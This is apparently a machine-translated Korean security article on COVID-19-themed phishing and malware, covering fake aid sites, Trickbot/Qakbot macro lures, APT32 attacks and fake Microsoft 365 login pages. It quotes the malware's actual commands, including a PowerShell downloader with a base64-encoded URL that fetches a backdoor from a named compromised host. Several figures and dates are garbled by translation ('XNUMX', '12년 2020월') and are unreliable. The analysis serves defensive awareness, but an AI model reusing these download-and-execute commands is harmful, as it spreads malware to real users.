코로나바이러스 사이버 공격: 요점은 사회 공학에 있습니다

공격자들은 계속해서 코로나19 주제를 악용하여 전염병과 관련된 모든 것에 깊은 관심을 갖고 있는 사용자에게 점점 더 많은 위협을 가하고 있습니다. 안에 마지막 게시물 우리는 코로나바이러스 사태 이후 어떤 종류의 악성코드가 등장했는지에 대해 이미 이야기했고, 오늘은 러시아를 포함한 여러 나라의 사용자들이 이미 접한 사회공학 기법에 대해 이야기해보겠습니다. 일반적인 추세와 예시는 삭제되었습니다.

기억하다 지난 번에 우리는 사람들이 코로나바이러스와 전염병의 진행 과정뿐만 아니라 재정 지원 조치에 대해서도 기꺼이 읽고 싶어한다는 사실에 대해 이야기했습니다. 여기에 좋은 예가 있습니다. 독일 노르트라인베스트팔렌주(NRW)에서 흥미로운 피싱 공격이 발견되었습니다. 공격자는 경제부 웹사이트(NRW 경제부) 누구나 재정 지원을 신청할 수 있습니다. 이러한 프로그램은 실제로 존재하며 사기꾼에게 유리한 것으로 나타났습니다. 그들은 피해자의 개인정보를 받은 후 실제 사역 웹사이트에 신청했지만 다른 은행 정보도 표시했습니다. 공식 데이터에 따르면, 이 계획이 발견될 때까지 그러한 가짜 요청이 4천 건에 달했습니다. 그 결과, 피해를 입은 시민을 위한 109억 XNUMX백만 달러가 사기꾼의 손에 넘어갔습니다.

코로나19 무료 검사를 원하시나요?

코로나바이러스를 주제로 한 피싱의 또 다른 중요한 예는 다음과 같습니다. 발견 이메일에서. 해당 메시지는 코로나바이러스 감염 여부를 무료로 검사해 주겠다는 제안으로 사용자들의 관심을 끌었습니다. 이들 첨부자료에는 편지 Trickbot/Qakbot/Qbot의 사례가 있었습니다. 그리고 자신의 건강을 확인하려는 사람들이 '첨부 양식 작성'을 시작하자 악성 스크립트가 컴퓨터에 다운로드됐다. 그리고 샌드박싱 테스트를 피하기 위해 스크립트는 보호 시스템이 악의적인 활동이 발생하지 않을 것이라고 확신한 일정 시간이 지난 후에야 주요 바이러스를 다운로드하기 시작했습니다.

대부분의 사용자가 매크로를 활성화하도록 설득하는 것도 쉬웠습니다. 이를 위해 표준 트릭이 사용되었습니다. 설문지를 작성하려면 먼저 매크로를 활성화해야 합니다. 즉, VBA 스크립트를 실행해야 합니다.

보시다시피 VBA 스크립트는 바이러스 백신에서 특별히 가려져 있습니다.

Windows에는 응용 프로그램이 기본 "예" 응답을 수락하기 전에 /T <초>를 기다리는 대기 기능이 있습니다. 우리의 경우 스크립트는 임시 파일을 삭제하기 전에 65초를 기다렸습니다.

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

그리고 기다리는 동안 악성코드가 다운로드되었습니다. 이를 위해 특별한 PowerShell 스크립트가 시작되었습니다.

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

Base64 값을 디코딩한 후 PowerShell 스크립트는 이전에 해킹된 독일 웹 서버에 있는 백도어를 다운로드합니다.

http://automatischer-staubsauger.com/feature/777777.png

다음 이름으로 저장합니다.

C:UsersPublictmpdirfile1.exe

폴더 ‘C:UsersPublictmpdir’ 해당 명령이 포함된 'tmps1.bat' 파일을 실행하면 삭제됩니다. cmd /c mkdir ""C:UsersPublictmpdir"".

정부 기관을 대상으로 한 표적 공격

또한, FireEye 분석가들은 최근 우한의 정부 기관과 중국 비상관리부를 표적으로 삼은 APT32 공격이 보고되었습니다. 배포된 RTF 중 하나에는 New York Times 기사에 대한 링크가 포함되어 있습니다. 코로나바이러스 라이브 업데이트: 중국은 후베이에서 온 여행자를 추적하고 있습니다. 그러나 이를 읽은 후 악성코드가 다운로드되었습니다(FireEye 분석가는 이 인스턴스를 METALJACK으로 식별했습니다).

흥미롭게도 Virustotal에 따르면 탐지 당시 바이러스 백신 중 어느 것도 이 인스턴스를 탐지하지 못했습니다.

공식 웹사이트가 다운된 경우

피싱 공격의 가장 눈에 띄는 사례는 바로 얼마 전 러시아에서 발생했습니다. 그 이유는 3~16세 어린이를 대상으로 오랫동안 기다려온 혜택이 지정되었기 때문입니다. 12년 2020월 XNUMX일에 신청 접수 시작이 발표되었을 때 수백만 명이 오랫동안 기다려온 도움을 받기 위해 주정부 서비스 웹사이트로 달려갔고 전문적인 DDoS 공격보다 나쁘지 않은 포털을 다운시켰습니다. 대통령이 “정부가 지원자의 흐름을 감당할 수 없다”고 말하자 사람들은 온라인에서 지원서를 접수할 수 있는 대체 사이트 개설에 대해 이야기하기 시작했다.

문제는 여러 사이트가 동시에 작동하기 시작했고 실제 사이트인 posobie16.gosuslugi.ru는 실제로 응용 프로그램을 허용하는 반면 더 많은 사이트가 작동한다는 것입니다. 수십 명이 속기 쉬운 사용자의 개인 데이터를 수집합니다..

SearchInform의 동료들은 .ru 영역에서 약 30개의 새로운 사기성 도메인을 발견했습니다. Infosecurity와 Softline Company는 70월 초부터 16개 이상의 유사한 가짜 정부 서비스 웹사이트를 추적했습니다. 제작자는 친숙한 기호를 조작하고 gosuslugi, gosuslugi-XNUMX, vyplaty, covid-vyplaty, posobie 등의 단어 조합을 사용합니다.

과대광고와 사회공학

이러한 모든 예는 공격자가 코로나바이러스라는 주제로 성공적으로 수익을 창출하고 있음을 확인할 뿐입니다. 그리고 사회적 긴장이 높아지고 문제가 불분명해질수록 사기꾼이 중요한 데이터를 훔치거나 사람들이 스스로 돈을 포기하도록 강요하거나 단순히 더 많은 컴퓨터를 해킹할 가능성이 더 커집니다.

그리고 팬데믹으로 인해 준비가 안 된 사람들이 대규모로 재택근무를 하게 되면서 개인 데이터뿐만 아니라 기업 데이터도 위험에 처해 있습니다. 예를 들어 최근에는 Microsoft 365(이전 Office 365) 사용자도 피싱 공격을 받았습니다. 사람들은 편지에 첨부된 내용으로 대량의 '부재중' 음성 메시지를 받았습니다. 그러나 파일은 실제로 공격 피해자를 다음으로 보내는 HTML 페이지였습니다. 가짜 Microsoft 365 로그인 페이지. 결과적으로 계정의 모든 데이터에 대한 액세스 권한이 상실되고 손상됩니다.

출처 : habr.com